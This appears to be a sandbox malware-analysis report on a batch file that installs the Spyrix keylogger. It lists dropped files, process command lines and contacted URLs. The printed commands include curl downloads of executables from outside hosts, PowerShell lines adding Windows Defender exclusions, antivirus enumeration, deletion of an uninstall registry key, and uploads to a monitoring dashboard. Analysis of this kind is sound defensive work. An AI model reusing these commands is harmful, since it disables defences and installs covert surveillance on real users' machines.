SQLite 3.x database, last written using SQLite version 3013000, file counter 10, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 10
dropped
C:\ProgramData\Spyrix Free Keylogger\temp\stat\dlog\2024-10.wdb-journal
SQLite Rollback Journal
dropped
C:\ProgramData\{972DC8CA-126D-23FD-11AA-92876DD12AFD}\5913A2D6482586A397876746C6020FBE
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\REG7F99.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\REGCB67.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05ubxjdy.kxy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0x34pnkz.zgz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xtf2sp3.mwx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z2f0ucl.cl3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21yamr1d.idj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25b3wzjk.hhd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ofq5iwo.ejb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3drj5blw.cey.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_422j5yu0.wqv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42s2nobh.duz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xqutnav.0t2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52b1a2ao.bth.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xdsznc4.iyx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1ogi30j.txr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adg5l4y5.0at.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcqbbkqb.kqb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdunmr4b.n0g.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebovtinq.epj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egin1fc4.ywe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffxidwzf.xpo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvuq5nfy.c5c.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g20nlqcv.lmk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbsvjqxx.1nl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1gbx5gu.ja2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3zss5pf.q4e.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iugvvcmp.sh5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjwafj51.1nk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjwznhhs.q32.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krbawg1r.aau.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqa00r32.ph5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnkhwsiw.fro.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnlmhvdk.tl2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npbsign0.q1l.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obvvy3rw.bwf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocgxn2kf.vnn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oguz5xdg.nbw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb5lws0y.hxq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfxs025v.n4p.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rogkn3sf.n5u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trdvw34i.laf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txnentbw.wom.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueehqv15.4cl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2rpwjs5.25n.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xb5ihyto.be5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbtnkbqn.dtc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxbbhgn3.4dg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxb54v4g.on4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzwrdkxj.gn2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l
ASCII text, with no line terminators
modified
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\stld2.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\stld3.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\$ywr34c.tmp
ASCII text, with CRLF, CR line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_iscrypt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_isdecmp.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_setup64.tmp
PE32+ executable (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\iMsgInfo.bmp
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\psout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\psout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\sout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\sout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spmmout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spmmout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spsout
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\spsout_p
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\webbrowser.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\nse
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\sfkname.tmp
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tpl556z6i5ctbzg
ASCII text, with very long lines (835), with CRLF line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
Chrome Cache Entry: 622
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
downloaded
Chrome Cache Entry: 623
Java source, ASCII text, with very long lines (1184)
downloaded
Chrome Cache Entry: 624
Java source, ASCII text, with very long lines (3701)
dropped
Chrome Cache Entry: 625
Java source, ASCII text, with very long lines (1184)
dropped
Chrome Cache Entry: 626
Java source, ASCII text, with very long lines (522)
downloaded
Chrome Cache Entry: 627
ASCII text
dropped
Chrome Cache Entry: 628
Java source, ASCII text, with very long lines (612)
dropped
Chrome Cache Entry: 629
ASCII text
downloaded
Chrome Cache Entry: 630
ASCII text, with very long lines (2465)
downloaded
Chrome Cache Entry: 631
ASCII text, with very long lines (773)
downloaded
Chrome Cache Entry: 632
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 633
Java source, ASCII text, with very long lines (3701)
downloaded
Chrome Cache Entry: 634
ASCII text, with very long lines (628)
dropped
Chrome Cache Entry: 635
Java source, ASCII text, with very long lines (612)
downloaded
Chrome Cache Entry: 636
ASCII text, with very long lines (1097)
dropped
Chrome Cache Entry: 637
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
dropped
Chrome Cache Entry: 638
ASCII text
downloaded
Chrome Cache Entry: 639
Java source, ASCII text, with very long lines (4588)
dropped
Chrome Cache Entry: 640
Java source, ASCII text, with very long lines (795)
dropped
Chrome Cache Entry: 641
Java source, ASCII text, with very long lines (4588)
downloaded
Chrome Cache Entry: 642
Java source, ASCII text, with very long lines (1391)
dropped
Chrome Cache Entry: 643
ASCII text, with very long lines (773)
dropped
Chrome Cache Entry: 644
Java source, Unicode text, UTF-8 text, with very long lines (731)
downloaded
Chrome Cache Entry: 645
gzip compressed data, max speed, from Unix, original size modulo 2^32 1269714
downloaded
Chrome Cache Entry: 646
ASCII text, with very long lines (1512)
downloaded
Chrome Cache Entry: 647
ASCII text
downloaded
Chrome Cache Entry: 648
ASCII text, with very long lines (3064)
downloaded
Chrome Cache Entry: 649
Java source, ASCII text, with very long lines (522)
dropped
Chrome Cache Entry: 650
ASCII text
downloaded
Chrome Cache Entry: 651
C++ source, Unicode text, UTF-8 text
downloaded
Chrome Cache Entry: 652
ASCII text, with very long lines (5945)
dropped
Chrome Cache Entry: 653
Java source, ASCII text, with very long lines (837)
dropped
Chrome Cache Entry: 654
gzip compressed data, max speed, from Unix, original size modulo 2^32 61324
downloaded
Chrome Cache Entry: 655
Java source, Unicode text, UTF-8 text, with very long lines (731)
dropped
Chrome Cache Entry: 656
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 657
Web Open Font Format (Version 2), TrueType, length 44112, version 1.0
downloaded
Chrome Cache Entry: 658
Web Open Font Format (Version 2), TrueType, length 43608, version 1.0
downloaded
Chrome Cache Entry: 659
ASCII text
downloaded
Chrome Cache Entry: 660
gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
dropped
Chrome Cache Entry: 661
ASCII text
dropped
Chrome Cache Entry: 662
ASCII text, with very long lines (628)
downloaded
Chrome Cache Entry: 663
ASCII text, with very long lines (1097)
downloaded
Chrome Cache Entry: 664
HTML document, ASCII text
downloaded
Chrome Cache Entry: 665
C++ source, Unicode text, UTF-8 text
dropped
Chrome Cache Entry: 666
ASCII text, with very long lines (2720)
downloaded
Chrome Cache Entry: 667
PNG image data, 184 x 184, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 668
Java source, ASCII text, with very long lines (1391)
downloaded
Chrome Cache Entry: 669
Java source, Unicode text, UTF-8 text, with very long lines (5161)
downloaded
Chrome Cache Entry: 670
ASCII text, with very long lines (5945)
downloaded
Chrome Cache Entry: 671
Java source, Unicode text, UTF-8 text, with very long lines (5161)
dropped
Chrome Cache Entry: 672
Java source, ASCII text, with very long lines (837)
downloaded
Chrome Cache Entry: 673
Java source, ASCII text, with very long lines (795)
downloaded
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 1034 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\c5WMpr1cOc.bat" "
malicious
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-19\Environment"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
malicious
C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe
"C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd
malicious
C:\Windows\SysWOW64\reg.exe
reg query "HKU\S-1-5-19\Environment"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"
malicious
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe
"C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
malicious
C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp
"C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp" /SL5="$30454,32862490,227328,C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
malicious
C:\Windows\System32\reg.exe
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
malicious
C:\Windows\System32\reg.exe
reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
malicious
C:\Windows\SysWOW64\regedit.exe
"regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
malicious
C:\Windows\SysWOW64\reg.exe
"reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c plist.cmd
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
malicious
C:\Windows\SysWOW64\NETSTAT.EXE
netstat.exe -e
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 83
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 112
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 121
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 114
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 105
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c exit 120
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
C:\Windows\SysWOW64\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WMIC.exe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\timeout.exe
timeout 20
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout 6
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1936,i,1509766979292889431,16591483089158193991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "spm"
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "sem"
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "spkl"
C:\Windows\SysWOW64\tasklist.exe
TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
C:\Windows\SysWOW64\find.exe
find "clv"
There are 75 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.jrsoftware.org/0
unknown
https://dashboard.spyrix.com/account/login-from-program?email=
unknown
https://api.dropbox.com/1/fileops/copy
unknown
https://dashboard.spyrix.com/account/login-from-program
unknown
https://spyrix.net/dashboard/prg-actionstps://s
unknown
https://spyrix.net/usr/monitor/
unknown
https://Spyrix.net/dashboard/prg-list
158.69.117.119
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exen
unknown
https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
unknown
https://dashboard.spyrix.com/qqS
unknown
http://www.fontbureau.com/designers
unknown
http://www.indyproject.org/
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exem(ac
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkM
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108
23.109.93.100
https://g.live.com/odclientsettings/Prod.C:
unknown
http://www.spyrix.com/pro_upgrade.htm?lic=
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkG
unknown
http://crl.certum.pl/ca.crl0:
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkE
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
unknown
https://spyrix.net/dashboard/prg-actions
158.69.117.119
https://dashboard.spyrix.com/cdn.js
158.69.117.119
http://www.galapagosdesign.com/DPlease
unknown
http://www.myspace.com/search/
unknown
https://api.dropbox.com/1/fileops/create_folder?
unknown
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js
95.181.182.182
http://www.zhongyicts.com.cn
unknown
https://swtb-download.spyrix-
unknown
https://www.spyrix.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
